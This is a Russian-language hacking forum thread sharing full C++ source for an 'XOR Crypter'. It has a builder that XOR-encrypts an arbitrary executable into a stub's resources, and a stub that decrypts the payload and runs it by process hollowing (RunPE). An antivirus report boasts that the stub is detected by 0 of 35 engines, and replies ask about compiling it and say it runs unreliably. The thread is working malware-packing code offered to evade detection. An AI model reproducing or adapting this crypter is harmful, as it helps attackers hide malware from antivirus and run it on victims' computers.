XOR Crypter

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

rain.hf

Житель форума
Форумчанин
Регистрация
08.12.2015
Сообщения
133
Репутация
112
#1
билдер

Код:
#include <iostream>
#include <Windows.h>
#include <fstream>
#include <vector>
#include <string>
using namespace std;

char * FB;
DWORD fs;
char output[MAX_PATH];
char choice;
DWORD dwBytesWritten = 0;
char name[MAX_PATH];
std::vector<char> file_data;
void RDF()
{
    DWORD bt;
                            
    cout << "Please enter the Path of the file \nIf the file is in the same folder as the builder\nJust type the file name with an extention\nEG: Malvare.exe\n";
    cout << "File Name: ";
    cin >> name;
    cout << "Enter output name: ";
    cin >> output;
    CopyFile("stub.exe", output/*L"Crypted.exe"*/, 0);
    cout << "\nGetting the HANDLE of the file to be crypted\n";
    HANDLE efile = CreateFileA(name, GENERIC_ALL,FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    cout << "Getting the File size\n";
    fs = GetFileSize(efile, NULL);

    cout << "The File Size is: ";
    cout << fs;
    cout << " Bytes\n";
    cout << "Allocating Memory for the ReadFile function\n";
    file_data.resize(fs);
    cout << "Reading the file\n";


    ReadFile(efile, (LPVOID)(file_data.data()), fs, &bt, NULL);

    CloseHandle(efile);

    if (fs != bt)
        cout << "Error reading file!" << endl;
}

void xor_crypt(const std::string &key, std::vector<char> &data)
{
    for (size_t i = 0; i != data.size(); i++)
        data[i] ^= key[i % key.size()];

    /*ofstream out("After_enc.dat");
    for (std::vector<char>::const_iterator it = data.begin(), itEnd = data.end(); it != itEnd; ++it)
        out << *it;*/
}

void choose_enc()
{

    cout << "\n\nChoose encryption method: " << endl;
    cout << "1. N/A" << endl;
    cout << "2. Simple XOR" << endl;
    cin >> choice;
}

void enc()
{
    cout << "Encrypting the Data\n";

    switch (choice)
    {
    case '1':
        break;
    case '2':
        {
            /*ofstream myfile("2.dat");
            for (std::vector<char>::const_iterator it = file_data.begin(), itEnd = file_data.end(); it != itEnd; ++it)
                myfile << *it;*/
            xor_crypt("penguin", file_data); //Encrypt it

        }
        break;
        return;
    }
}

void WriteToResources(LPTSTR szTargetPE, int id, LPBYTE lpBytes, DWORD dwSize)
{
    cout << "Writing Encrypted data to stub's resources\n";
    HANDLE hResource = NULL;
    hResource = BeginUpdateResource(szTargetPE, FALSE);
    //LPVOID lpResLock = LockResource(lpBytes);
    UpdateResource(hResource, RT_RCDATA, MAKEINTRESOURCE(id), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),(LPVOID)lpBytes, dwSize);
    EndUpdateResource(hResource, FALSE);
}

int main()
{
    std::string key = "penguin";
    RDF();
    choose_enc();
    enc();
    file_data.push_back(choice);
    cout << fs << endl;
    WriteToResources(output, 10, (BYTE *)file_data.data(), file_data.size());
    cout << "Your File Got Crypted\n";
    system("PAUSE");
}
Стаб

runpe.h
Код:
#include <Windows.h>
#include <TlHelp32.h>
#include <wchar.h>
typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
typedef BOOL(WINAPI * NtSetThreadContext)(HANDLE hThread, PCONTEXT lpContext);
typedef LPVOID(WINAPI * callVirtualAlloc)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef LPVOID(WINAPI * callVirtualAllocEx)(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef bool(WINAPI * callReadProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
typedef bool(WINAPI * callWriteProcessMemory)(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
typedef HANDLE(WINAPI * callCreateToolhelp32Snapshot)(DWORD dwFlags, DWORD th32ProcessID);
typedef HANDLE(WINAPI * callProcess32First)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
typedef HANDLE(WINAPI * callProcess32Next)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);




void ExecFile(LPSTR szFilePath, LPVOID pFile)
{
    PIMAGE_DOS_HEADER IDH;
    PIMAGE_NT_HEADERS INH;
    PIMAGE_SECTION_HEADER ISH;
    PROCESS_INFORMATION PI;
    STARTUPINFOA SI;
    PCONTEXT CTX;
    PDWORD dwImageBase;
    NtUnmapViewOfSection xNtUnmapViewOfSection;
    NtSetThreadContext xNtSetThreadContext;
    callReadProcessMemory xReadProcessMemory;
    callWriteProcessMemory xWriteProcessMemory;
    callVirtualAlloc xVirtualAlloc;
    callVirtualAllocEx xVirtualAllocEx;
    LPVOID pImageBase;
    int Count;
    IDH = PIMAGE_DOS_HEADER(pFile);
    if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
    {
        INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
        if (INH->Signature == IMAGE_NT_SIGNATURE)
        {
            RtlZeroMemory(&SI, sizeof(SI));
            RtlZeroMemory(&PI, sizeof(PI));

            if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
            {
                xVirtualAlloc = callVirtualAlloc(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAlloc"));
                xVirtualAllocEx = callVirtualAllocEx(GetProcAddress(GetModuleHandleA("kernel32.dll"), "VirtualAllocEx"));
                xReadProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "ReadProcessMemory"));
                xWriteProcessMemory = callReadProcessMemory(GetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
                CTX = PCONTEXT(xVirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                CTX->ContextFlags = CONTEXT_FULL;
                if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                {
                    xReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);

                    if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                    {
                        xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                        xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                    }

                    pImageBase = xVirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);



                    if (pImageBase)
                    {
                        xWriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                        for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                        {
                            ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                            xWriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                        }
                        xWriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                        CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;

                        xNtSetThreadContext = NtSetThreadContext(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetContextThread"));
                        xNtSetThreadContext(PI.hThread, LPCONTEXT(CTX));

                        ResumeThread(PI.hThread);
                    }



                }
            }
        }
    }
    VirtualFree(pFile, 0, MEM_RELEASE);
}
main

Код:
#include <iostream>
#include <Windows.h>
#include <fstream>
#include "Runpe.h"
#include <vector>
#include <string>
using namespace std;


int Rsize;


std::vector<char> RData;

void Resource(int id)
{
    size_t Rsize;

    HRSRC hResource = FindResource(NULL, MAKEINTRESOURCE(id), RT_RCDATA);
    HGLOBAL temp = LoadResource(NULL, hResource);
    Rsize = SizeofResource(NULL, hResource);
    RData.resize(Rsize);
    memcpy((void*)RData.data(), temp, Rsize);  // replace &RData[0] with RData.data() if C++11
}

void xor_crypt(const std::string &key, std::vector<char> &data)
{
    for (size_t i = 0; i != data.size(); i++)
        data[i] ^= key[i % key.size()];
}



void enc()
{
    switch (RData.back())
    {
    case '1':
        {
            std::ofstream out("1.txt");
        }
        break;
    case '2':
        {
            xor_crypt("penguin", RData);
        }
        break;
    }
    return;
}



int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{

    Resource(10);
    enc();

    LPVOID pFile;
    TCHAR szFilePath[1024];

    pFile = RData.data();
    if (pFile)
    {
        GetModuleFileNameA(0, LPSTR(szFilePath), 1024);

        ExecFile(LPSTR(szFilePath), pFile);
    }
    return 0;
};

Filename: Stub.exe
Filesize: 309,50 kB
Date: 2016-04-27 08:07:58
MD5: 8a51b89c2da3f4acbac2ad0f68f17a02
SHA1: 3d3165543d782c405eb768e4e34d47608b88a05c
Status: Clean
Rate: 0/35

Details:
Ad-Aware - File is clean
A-Squared - File is clean
Avast - File is clean
AVG Free - File is clean
AntiVir (Avira) - File is clean
BitDefender - File is clean
BullGuard - File is clean
Clam Antivirus - File is clean
COMODO Internet Security - File is clean
Dr.Web - File is clean
ESET NOD32 - File is clean
eTrust-Vet - File is clean
FortiClient - File is clean
F-PROT Antivirus - File is clean
F-Secure Internet Security - File is clean
G Data - File is clean
IKARUS Security - File is clean
K7 Ultimate - File is clean
Kaspersky Antivirus - File is clean
McAfee - File is clean
MS Security Essentials - File is clean
NANO Antivirus - File is clean
Norman - File is clean
Norton Antivirus - File is clean
Panda CommandLine - File is clean
Panda Security - File is clean
Quick Heal Antivirus - File is clean
Solo Antivirus - File is clean
Sophos - File is clean
SUPERAntiSpyware - File is clean
Trend Micro Internet Security - File is clean
Twister Antivirus - File is clean
VBA32 Antivirus - File is clean
VIPRE - File is clean
Zoner AntiVirus - File is clean

Scan Result: https://scan.majyx.net/scans/result/a138fa1dbfe5b6431e2f17d61b38cdd17b429ee8
Scan by MaJyx Scanner
 
Последнее редактирование:

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
414
Репутация
174
#2
Никогда не имел дела с VS как там компилировать/какой тип проекта выбирать?
 

Platon666

Житель форума
Форумчанин
Регистрация
14.08.2014
Сообщения
58
Репутация
10
Jabber
#4
Ради интереса собрал, но криптованый файл через раз запускался.
 
Вверх